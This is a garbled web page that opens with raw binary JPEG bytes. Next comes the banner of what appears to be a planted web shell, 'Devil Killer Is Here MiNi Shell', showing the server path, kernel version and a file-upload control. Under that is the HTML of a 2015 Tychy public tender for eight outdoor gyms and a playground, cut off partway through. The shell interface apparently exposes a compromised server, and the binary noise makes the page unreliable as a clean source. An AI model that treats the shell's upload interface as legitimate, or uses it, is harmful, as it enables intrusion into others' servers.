JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150623/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150623/92485-N-2015.html

<p class="kh_header"><b>Tychy: Budowa siłowni plenerowych oraz placu zabaw w Tychach</b><br>
<b>Numer ogłoszenia: 92485 - 2015; data zamieszczenia: 23.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Tychy , Al. Niepodległości 49, 43-100 Tychy, woj. śląskie, tel. (032) 7763333, faks (032) 7763344.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umtychy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa siłowni plenerowych oraz placu zabaw w Tychach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa ośmiu siłowni plenerowych oraz placu zabaw w Tychach z podziałem na następujące zadania:

Zadanie nr 1 - Budowa siłowni plenerowej przy ul. Zelwerowicza
Dostawa i montaż następujących urządzeń:
1.	biegacz podwójny- 1 szt.
2.	wyciąg górny podwójny - 1 szt.
3.	krzesło do wyciskania podwójne - 1 szt.
4.	prasa nożna podwójna - 1 szt.
5.	orbitrek podwójny - 1 szt.
6.	wioślarz podwójny - 1 szt.
7.	rower podwójny - 1 szt.
8.	jeździec podwójny - 1 szt.
9.	surfer podwójny - 1 szt.
10.	twister podwójny - 1 szt.
11.	stepper podwójny - 1 szt. 
12.	ławka podwójna - 1 szt.
13.	małe koła TAI CHI - 1 szt.
14.	duże koła TAI CHI - 1 szt.
15.	masażer  podwójny - 1 szt.
16.	poręcze - 1 szt.
17.	drążek do podciągania podwójny - 1 szt.
18.	DLA ON - sztanga z obciążeniem do wypychania i surfer z obciążeniem do ćwiczenia rąk - 1 szt.
19.	ławka z oparciem - 3 szt.     
20.	kosz na śmieci - 3 szt.  
21.	tablica z regulaminem - 1 szt.                               
- wykonanie nawierzchni poliuretanowej wraz z podbudową.

Zadanie nr 2 - Budowa siłowni plenerowej przy skrzyżowaniu ulic Borowej i Jaśkowickiej
Dostawa i montaż następujących urządzeń:
1.	biegacz podwójny - 1 szt.
2.	wyciąg górny podwójny - 1 szt.
3.	krzesło do wyciskania podwójne - 1 szt.
4.	orbitrek podwójny - 1 szt.
5.	wioślarz podwójny - 1 szt.
6.	rower podwójny - 2 szt.
7.	jeździec podwójny - 1 szt.
8.	surfer podwójny - 1 szt.
9.	ławka podwójna - 1 szt.
10.	ławka z oparciem - 3 szt.     
11.	kosz na śmieci - 3 szt.  
- wykonanie nawierzchni poliuretanowej wraz z podbudową.

Zadanie nr 3 - Budowa siłowni plenerowej w sąsiedztwie Szkoły Podstawowej nr 35 przy al. Piłsudskiego
Dostawa i montaż następujących urządzeń:
1.	biegacz podwójny - 1 szt.
2.	wyciąg górny podwójny - 1 szt.
3.	krzesło do wyciskania podwójne - 1 szt.
4.	prasa nożna podwójna - 1 szt.
5.	orbitrek podwójny - 1 szt.
6.	wioślarz podwójny - 1 szt.
7.	rower podwójny - 1 szt.
8.	jeździec podwójny - 1 szt.
9.	surfer podwójny - 1 szt.
10.	twister podwójny - 1 szt.
11.	stepper podwójny - 1 szt. 
12.	ławka podwójna - 1 szt.
13.	małe koła TAI CHI - 1 szt.
14.	duże koła TAI CHI - 1 szt.
15.	masażer podwójny - 1 szt.
16.	poręcze - 1 szt.
17.	drążek do podciągania podwójny - 1 szt.
18.	DLA ON - sztanga z obciążeniem do wypychania i surfer z obciążeniem do ćwiczenia rąk   - 1 szt.
19.	ławka z oparciem - 3 szt.     
20.	kosz na śmieci - 3 szt.  
21.	tablica z regulaminem - 1 szt.                               

Zadanie nr 4 - Budowa siłowni plenerowej przy ul. Obywatelskiej
Dostawa i montaż następujących urządzeń:
1.	krzesło do wyciskania podwójne - 1 szt.
2.	orbitrek podwójny - 1 szt.
3.	wioślarz podwójny - 1 szt.
4.	ławka podwójna - 1 szt.
5.	drążek do podciągania podwójny - 1 szt.
6.	ławka z oparciem - 2 szt.   
7.	kosz na śmieci - 2 szt.  
- budowa placu zabaw, wyposażonego w następujące urządzenia: 
1.	Zestaw zabawowy 
2.	Huśtawka pojedyncza (siedzisko koszyczkowe)
3.	Huśtawka podwójna opony 
4.	Huśtawka ważka 
- wykonanie nawierzchni piaskowej w strefach bezpieczeństwa urządzeń
- wykonanie dojścia o nawierzchni z płyt ażurowych na podbudowie.
Zadanie nr 5 - Budowa siłowni plenerowej na placu zabaw przy ul. Cmentarnej
Dostawa i montaż następujących urządzeń:
1.	krzesło do wyciskania podwójne - 1 szt.
2.	orbitrek podwójny - 1 szt.
3.	wioślarz podwójny - 1 szt. 
4.	rower podwójny - 1 szt.
- wykonanie nawierzchni poliuretanowej wraz z podbudową.

Zadanie nr 6 - Budowa siłowni plenerowej przy ul. Przejazdowej
Dostawa i montaż następujących urządzeń:
1.	biegacz podwójny - 2 szt.
2.	wyciąg górny podwójny - 1 szt.
3.	krzesło do wyciskania podwójne - 1 szt.
4.	orbitrek podwójny - 1 szt.
5.	wioślarz podwójny - 1 szt.
6.	rower podwójny - 1 szt.
7.	surfer podwójny - 1 szt.
8.	ławka podwójna - 1 szt.
9.	ławka z oparciem - 1 szt.     
10.	kosz na śmieci - 1 szt.  
- wykonanie nawierzchni poliuretanowej wraz z podbudową.

Zadanie nr 7 - Budowa siłowni plenerowej przy II LO przy ul. Norwida
Dostawa i montaż następujących urządzeń:
1.	biegacz podwójny - 1 szt.
2.	wyciąg górny podwójny - 1 szt.
3.	krzesło do wyciskania podwójne - 1 szt.
4.	prasa nożna podwójna - 1 szt.
5.	orbitrek podwójny - 1 szt.
6.	wioślarz podwójny - 1 szt.
7.	rower podwójny - 1 szt.
8.	jeździec podwójny - 1 szt.
9.	surfer podwójny - 1 szt.
10.	twister podwójny - 1 szt.
11.	ławka podwójna - 1 szt.
12.	masażer podwójny - 1 szt.
13.	drążek do podciągania podwójny - 1 szt.
14.	ławka z oparciem - 3 szt.     
15.	kosz na śmieci - 3  szt.  

Zadanie nr 8 - Budowa siłowni plenerowej przy ul. Wojska Polskiego w sąsiedztwie Przedszkola nr 8
Dostawa i montaż następujących urządzeń:
1.	biegacz podwójny - 1 szt.
2.	wyciąg górny podwójny- 1 szt.
3.	krzesło do wyciskania podwójne - 1 szt.
4.	narciarz podwójny - 1 szt.
5.	orbitrek podwójny - 1 szt.
6.	motyl pojedynczy - 1 szt.
7.	rower podwójny - 1 szt.
8.	ławka podwójna - 1 szt.
9.	ławka z oparciem - 2 szt.   
10.	kosz na śmieci - 2  szt.  
- wykonanie nawierzchni poliuretanowej wraz z podbudową.

Wykonawca przed zabudowaniem każdego materiału budowlanego oraz urządzenia przedstawi zamawiającemu dokument dopuszczający go do stosowania i obrotu w budownictwie (atest, certyfikat, aprobatę).
Do obowiązków wykonawcy w ramach zamówienia należy także:
- zapewnienie obsługi geodezyjnej, w tym wykonanie mapy geodezyjnej powykonawczej dla każdego z zadań,
- uzyskanie zaplecza placu budowy, zabezpieczenie dojść i dojazdów,
- uporządkowanie terenu po zakończeniu prac (w tym także dojścia i dojazdy do płyty przez teren parku).
UWAGI DODATKOWE:
- Sprzęt, narzędzia pomiarowe wymagane do dokonania odbiorów technicznych robót Wykonawca udostępni nieodpłatnie na każde życzenie Inwestora. Ponadto w ramach wynagrodzenia Wykonawca zobowiązany jest uwzględnić wykonanie zabezpieczeń i oznakowań terenu budowy.
- W czasie realizacji zadania należy zapewnić na terenie budowy należyty ład i porządek, a w szczególności przestrzegać przepisów bhp oraz zapewnić niezbędne zabezpieczenia placu budowy.

Szczegółowy zakres robót został określony w dokumentacji projektowej autorstwa mgr inż. Marcina Laszczak - oddzielnie dla każdego z zadań - stanowiącej załącznik nr 7 do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.11.27.20-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 56.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferta musi być zabezpieczona wadium w wysokości:
Zadanie nr 1 - 3 200,00 PLN (słownie: trzy tysiące dwieście złotych 00/100 PLN)
Zadanie nr 2 - 2 000,00 PLN (słownie: dwa tysiące złotych 00/100 PLN)
Zadanie nr 3 - 1 700,00 PLN (słownie: tysiąc siedemset złotych 00/100 PLN)
Zadanie nr 4 - 1 700,00 PLN (słownie: tysiąc siedemset złotych 00/100 PLN)
Zadanie nr 5 - 1 000,00 PLN (słownie: tysiąc złotych 00/100 PLN)
Zadanie nr 6 - 1 700,00 PLN (słownie: tysiąc siedemset złotych 00/100 PLN)
Zadanie nr 7 - 1 500,00 PLN (słownie: tysiąc pięćset złotych 00/100 PLN)
Zadanie nr 8 - 1 500,00 PLN (słownie: tysiąc pięćset złotych 00/100 PLN)
2. Wadium należy wnieść przed upływem terminu składania ofert.
3. Wadium może być wnoszone w jednej lub kilku następujących formach:
a) pieniądzu:
przelewem z konta na konto na rachunek bankowy zamawiającego: 
Bank Polska Kasa Opieki Spółka Akcyjna 12 1240 2975 1111 0010 6077 6489 
Kod Swift (wymagany przy przelewach międzynarodowych): PKOP PL PW
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych, 
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
W przypadku wniesienia wadium w formach określonych w ppkt b do e dokument winien być wystawiony na Gminę Miasta Tychy, Al. Niepodległości 49, 43-100 Tychy. Niniejszy dokument należy dołączyć do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykonanie minimum dwóch robót budowlanych (każda z robót winna dotyczyć realizacji jednego zamówienia i być przedmiotem jednej umowy) niezależnie od ilości zadań do których wykonawca przystąpi - polegających na budowie siłowni plenerowej/ych lub placu/ów zabaw o wartości min. 90 000,00 zł brutto każda  - załącznik nr 5 do SIWZ. W przypadku złożenia oferty tylko na zadanie nr 5, wartość każdej z wyżej opisanej roboty winna wynosić min. 48 000,00 zł brutto. Do wykazu należy dołączyć dowody określające, czy roboty te zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest dysponowanie 1 osobą (niezależnie od ilości zadań do których wykonawca przystąpi) posiadającą uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno - budowlanej - załącznik nr 4 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne oświadczenia lub dokumenty niezbędne do przeprowadzenia postępowania, które należy dołączyć do oferty:
a) załącznik nr 1 do SIWZ - wypełniony formularz oferty,
b) załącznik nr 1a do SIWZ - wypełnione zbiorcze zestawienie kosztów, oddzielnie dla każdego z zadań do którego wykonawca przystąpi,
c) pełnomocnictwo lub umowa podmiotów występujących wspólnie wskazujące,                 że osoba występująca w imieniu wykonawcy jest do tego upoważniona, jeżeli nie wynika to z załączonych do oferty dokumentów,
d) dowód wpłaty wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany terminu wykonania przedmiotu umowy określonego w § 4 ogólnych warunków umowy jedynie w następujących przypadkach:
a)	w razie wystąpienia siły wyższej, czyli losowego zdarzenia zewnętrznego, którego skutków nie da się przewidzieć, np. intensywne opady atmosferyczne, huragan, a także w razie konieczności podjęcia działań zmierzających do ograniczenia skutków wystąpienia siły wyższej,
b)	w razie zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na termin wykonania przedmiotu umowy,
c)	w razie konieczności dokonania zmiany dokumentacji budowlano - wykonawczej w oparciu o którą ma być wykonany przedmiot umowy, jeżeli w trakcie wykonywania przedmiotu umowy okaże się, że dokumentacja ta zawiera błędy, braki lub wady.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umtychy.pl/zamowienia-publiczne/jednostki-organizacyjne-urzedu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wersja papierowa w cenie 150,00 zł
Urząd Miasta Tychy
Wydział Zamówień Publicznych pok. 808
Al. Niepodległości 49
43-100 Tychy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.07.2015 godzina 10:15, miejsce: Urząd Miasta Tychy
Wydział Zamówień Publicznych pok. 808
Al. Niepodległości 49
43-100 Tychy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa siłowni plenerowej przy ul. Zelwerowicza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i montaż następujących urządzeń:
1.	biegacz podwójny- 1 szt.
2.	wyciąg górny podwójny - 1 szt.
3.	krzesło do wyciskania podwójne - 1 szt.
4.	prasa nożna podwójna - 1 szt.
5.	orbitrek podwójny - 1 szt.
6.	wioślarz podwójny - 1 szt.
7.	rower podwójny - 1 szt.
8.	jeździec podwójny - 1 szt.
9.	surfer podwójny - 1 szt.
10.	twister podwójny - 1 szt.
11.	stepper podwójny - 1 szt. 
12.	ławka podwójna - 1 szt.
13.	małe koła TAI CHI - 1 szt.
14.	duże koła TAI CHI - 1 szt.
15.	masażer  podwójny - 1 szt.
16.	poręcze - 1 szt.
17.	drążek do podciągania podwójny - 1 szt.
18.	DLA ON - sztanga z obciążeniem do wypychania i surfer z obciążeniem do ćwiczenia rąk - 1 szt.
19.	ławka z oparciem - 3 szt.     
20.	kosz na śmieci - 3 szt.  
21.	tablica z regulaminem - 1 szt.                               
- wykonanie nawierzchni poliuretanowej wraz z podbudową..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.11.27.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres rękojmi za wady (min. 36 miesięcy max. 60 miesięcy) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa siłowni plenerowej przy skrzyżowaniu ulic Borowej i Jaśkowickiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i montaż następujących urządzeń:
1.	biegacz podwójny - 1 szt.
2.	wyciąg górny podwójny - 1 szt.
3.	krzesło do wyciskania podwójne - 1 szt.
4.	orbitrek podwójny - 1 szt.
5.	wioślarz podwójny - 1 szt.
6.	rower podwójny - 2 szt.
7.	jeździec podwójny - 1 szt.
8.	surfer podwójny - 1 szt.
9.	ławka podwójna - 1 szt.
10.	ławka z oparciem - 3 szt.     
11.	kosz na śmieci - 3 szt.  
- wykonanie nawierzchni poliuretanowej wraz z podbudową..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.11.27.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres rękojmi za wady (min. 36 miesięcy max. 60 miesięcy) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Budowa siłowni plenerowej w sąsiedztwie Szkoły Podstawowej nr 35 przy al. Piłsudskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i montaż następujących urządzeń:
1.	biegacz podwójny - 1 szt.
